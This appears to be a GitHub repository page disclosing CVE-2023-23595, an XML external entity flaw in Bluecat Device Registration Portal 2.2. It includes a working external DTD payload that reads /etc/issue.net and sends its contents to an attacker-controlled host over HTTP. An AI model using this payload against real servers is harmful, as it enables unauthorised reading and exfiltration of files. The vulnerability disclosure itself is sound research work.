Skip to content

colemanjp/XXE-Vulnerability-in-Bluecat-Device-Registration-Portal-DRP

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

XXE Vulnerability in Bluecat Device Registration Portal (DRP) CVE-2023-23595

Summary

Bluecat device registration portal / Bluecat DRP version 2 is vulnerable to information leakage via XML External Entity Injection / XXE.

Tested on version 2.2. Version 2 is no longer supported by the vendor.

I was only able to extract single line files - /etc/issue.net for example. This appears to be a feature of Java 7 and above per https://web.archive.org/web/20230113185834/https://stackoverflow.com/questions/58395997/xxe-unable-to-retrieve-files-with-multiple-lines

I was also able to exfiltrate single line files via outbound FTP.

Demonstration

Attacker server vps2 hosts x.xml

<!ENTITY % data SYSTEM "file:///etc/issue.net">
<!ENTITY % param1 "<!ENTITY extract SYSTEM 'http://vps2/?%data;'>">

POST to victim server re

re_burp.png

Read content of exfiltrated file /etc/issue.net in web log on attacker server vps2

re_log.png

Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23595

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published